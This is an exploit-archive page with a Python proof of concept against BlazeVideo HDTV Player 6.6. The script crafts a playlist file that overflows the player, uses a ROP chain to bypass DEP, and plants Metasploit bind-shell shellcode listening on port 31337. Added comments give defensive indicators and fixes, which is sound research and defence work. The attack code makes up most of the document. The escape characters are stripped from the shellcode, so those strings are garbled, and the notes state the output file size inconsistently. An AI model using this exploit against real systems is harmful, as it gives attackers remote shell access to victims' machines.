Home / exploits BlazeVideo HDTV Player 6.6 Professional Buffer Overflow
Posted on 07 October 2011
# Exploit Title: BlazeVideo HDTV Player 6.6 Professional (Universal DEP+ASLR Bypass)
# Author: modpr0be
# Software Download: http://www.blazevideo.com/download.php?product=blazevideo-hdtv-pro
# Date: 07/10/2011
# Tested on: Windows XP SP3, Windows Vista SP2, Windows 7 SP1
# Thanks: corelanc0d3r, cyb3r.anbu, otoy, sickness, 5m7x, loneferret, _sinn3r, mr_me
# Take a look at mona.py :) awesome tool developed by corelanc0d3r and his team:
# https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
# this is the old fashioned bug, i just try to make it universal :)
# it has also been exploited by:
# Greg Linares: http://www.exploit-db.com/exploits/2880
# LiquidWorm: http://www.exploit-db.com/exploits/7975
# hack4love: http://www.exploit-db.com/exploits/7975
# ThEg0bL!N: http://www.exploit-db.com/exploits/9360

# --- Reviewer notes (a defender's reading of this proof of concept) ---
# Everything the script does is visible below: it writes one 5000-byte
# playlist file ('blazevideo-universal.plf') consisting of filler bytes, a
# single SEH-handler overwrite, a chain of hard-coded return addresses taken
# from the player's own modules (DTVDeviceManager.dll, MediaPlayerCtrl.dll,
# EPG.dll, SkinScrollBar.Dll, AviosoftDTV.exe), a NOP sled and a
# Metasploit-generated bind-shell payload (comment says LPORT=31337).
# The script itself touches no network; the trigger is a user opening the
# crafted .plf in the vulnerable player.
#
# Points that follow directly from the code:
#  * Every gadget address is an absolute module address.  The "universal"
#    claim in the title therefore rests on those modules being mapped at the
#    same base on every system, i.e. not taking part in ASLR (inferred from
#    the addresses -- confirm against the binaries).  The vendor-side fix is
#    to link those modules with /DYNAMICBASE and /SAFESEH so that neither
#    the fixed gadget addresses nor the raw SEH overwrite work.
#  * The chain's own comments say it fetches VirtualProtect through an IAT
#    entry and finishes with PUSHAD # RETN, the usual shape of a DEP bypass
#    that re-protects the stack before jumping to the NOP sled.
#  * Cheap file-level indicator: a .plf of exactly 5000 bytes that is
#    almost entirely runs of 'A', 'B' and 'C'.  Host-side indicator for a
#    successful run: the player process listening on TCP 31337 (per the
#    payload comment).
#  * This is Python 2 code (print statements); it is kept verbatim here.

#!/usr/bin/python
import struct

# Output path for the crafted playlist.  NOTE: 'file' shadows the Python 2
# builtin of the same name.
file = 'blazevideo-universal.plf'
# Fixed size of the generated file; the tail is padded with 'C' to reach it.
totalsize = 5000
# 872 filler bytes before the SEH slot -- presumably the distance from the
# start of the overflowed buffer to the exception record (not derivable here).
junk = 'A' * 872
align = 'B' * 136 #we don't need nseh
# The single overwritten SEH handler: a stack pivot into the ROP chain below.
seh = struct.pack('<L', 0x6130534a) # ADD ESP,800 # RETN ** [DTVDeviceManager.dll]
# ROP chain.  Each comment is the author's disassembly of the gadget at that
# address; every address is absolute, so the chain only works while these
# modules load at their preferred base.
rop = struct.pack('<L', 0x61326003) * 10 # RETN (ROP NOP) [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0x6405347a) # POP EDX # RETN ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x10011108) # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
rop+= struct.pack('<L', 0x64010503) # PUSH EDX # POP EAX # POP ESI # RETN ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x41414141) # Filler (compensate)
rop+= struct.pack('<L', 0x6160949f) # MOV ECX,DWORD PTR DS:[EDX] # POP ESI # POP EBP # MOV DWORD PTR DS:[EAX],ECX # POP EBX # RETN 0C ** [EPG.dll]
rop+= struct.pack('<L', 0x41414141) * 3 # Filler (compensate)
rop+= struct.pack('<L', 0x61604218) # PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C ** [EPG.dll]
rop+= struct.pack('<L', 0x41414141) * 3 # Filler (RETN offset compensation)
rop+= struct.pack('<L', 0x6403d1a6) # POP EBP # RETN [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x41414141) * 3 # Filler (RETN offset compensation)
rop+= struct.pack('<L', 0x6161055A) # & push esp # ret 0c [EPG.dll]
rop+= struct.pack('<L', 0x61323EA8) # POP EAX # RETN ** [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0xA139799D) # 0x00000501-> ebx
rop+= struct.pack('<L', 0x640203fc) # ADD EAX,5EC68B64 # RETN ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x6163d37b) # PUSH EAX # ADD AL,5E # POP EBX # RETN ** [EPG.dll]
rop+= struct.pack('<L', 0x61626807) # XOR EAX,EAX # RETN ** [EPG.dll]
rop+= struct.pack('<L', 0x640203fc) # ADD EAX,5EC68B64 # RETN ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x6405347a) # POP EDX # RETN ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0xA13974DC) # 0x00000040-> edx
rop+= struct.pack('<L', 0x613107fb) # ADD EDX,EAX # MOV EAX,EDX # RETN ** [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0x61601fc0) # POP ECX # RETN [EPG.dll]
rop+= struct.pack('<L', 0x60350340) # &Writable location [AviosoftDTV.exe]
rop+= struct.pack('<L', 0x61329e07) # POP EDI # RETN [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0x61326003) # RETN (ROP NOP) [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0x61606595) # POP EAX # RETN ** [EPG.dll]
rop+= struct.pack('<L', 0x90909090) # nop
rop+= struct.pack('<L', 0x61620CF1) # PUSHAD # RETN [EPG.dll]
# NOP sled placed between the chain and the payload.
nop = 'x90' * 32
# Payload as emitted by Metasploit (author's generator banner kept verbatim).
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=31337, RHOST=, EXITFUNC=process,
shellcode = (
"xddxc1xd9x74x24xf4xbbxc4xaax69x8ax58x33xc9xb1"
"x56x83xe8xfcx31x58x14x03x58xd0x48x9cx76x30x05"
"x5fx87xc0x76xe9x62xf1xa4x8dxe7xa3x78xc5xaax4f"
"xf2x8bx5exc4x76x04x50x6dx3cx72x5fx6exf0xbax33"
"xacx92x46x4exe0x74x76x81xf5x75xbfxfcxf5x24x68"
"x8axa7xd8x1dxcex7bxd8xf1x44xc3xa2x74x9axb7x18"
"x76xcbx67x16x30xf3x0cx70xe1x02xc1x62xddx4dx6e"
"x50x95x4fxa6xa8x56x7ex86x67x69x4ex0bx79xadx69"
"xf3x0cxc5x89x8ex16x1exf3x54x92x83x53x1fx04x60"
"x65xccxd3xe3x69xb9x90xacx6dx3cx74xc7x8axb5x7b"
"x08x1bx8dx5fx8cx47x56xc1x95x2dx39xfexc6x8axe6"
"x5ax8cx39xf3xddxcfx55x30xd0xefxa5x5ex63x83x97"
"xc1xdfx0bx94x8axf9xccxdbxa1xbex43x22x49xbfx4a"
"xe1x1dxefxe4xc0x1dx64xf5xedxc8x2bxa5x41xa2x8b"
"x15x22x12x64x7cxadx4dx94x7fx67xf8x92xb1x53xa9"
"x74xb0x63x37xecx3dx85xadxfex6bx1dx59x3dx48x96"
"xfex3exbax8ax57xa9xf2xc4x6fxd6x02xc3xdcx7bxaa"
"x84x96x97x6fxb4xa9xbdxc7xbfx92x56x9dxd1x51xc6"
"xa2xfbx01x6bx30x60xd1xe2x29x3fx86xa3x9cx36x42"
"x5ex86xe0x70xa3x5excax30x78xa3xd5xb9x0dx9fxf1"
"xa9xcbx20xbex9dx83x76x68x4bx62x21xdax25x3cx9e"
"xb4xa1xb9xecx06xb7xc5x38xf1x57x77x95x44x68xb8"
"x71x41x11xa4xe1xaexc8x6cx11xe5x50xc4xbaxa0x01"
"x54xa7x52xfcx9bxdexd0xf4x63x25xc8x7dx61x61x4e"
"x6ex1bxfax3bx90x88xfbx69")
# 'sisa' is Indonesian for "remainder": the 'C' padding that brings the file
# to totalsize.  Note the length excludes junk and align, so the file is
# larger than totalsize by those 1008 bytes.
sisa = 'C' * (totalsize - len(seh+rop+nop+shellcode))
# Final on-disk layout: filler, SEH overwrite, alignment, ROP chain, NOP
# sled, payload, tail padding.
payload = junk+seh+align+rop+nop+shellcode+sisa
# Write the playlist (no context manager; Python 2 style).
f = open(file,'w')
print "Author: modpr0be"
f.write(payload)
print "File",file, "successfully created"
f.close()
